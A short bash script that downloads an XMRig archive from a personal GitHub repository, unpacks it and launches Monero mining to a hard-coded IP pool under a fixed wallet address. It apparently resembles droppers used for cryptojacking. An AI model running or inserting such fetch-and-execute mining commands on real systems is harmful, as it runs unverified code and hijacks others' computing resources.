#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 143.198.192.201:443 -u SaLvsCK7DtxPqyErYD3TBHWnietKHPU2WUhjfsnKdx5UZWad2QsLovSM6xEpeh8BV8dSxtm81oRRKF19eqdWPzjdYFndmkLgD9w -p maira -a rx/0
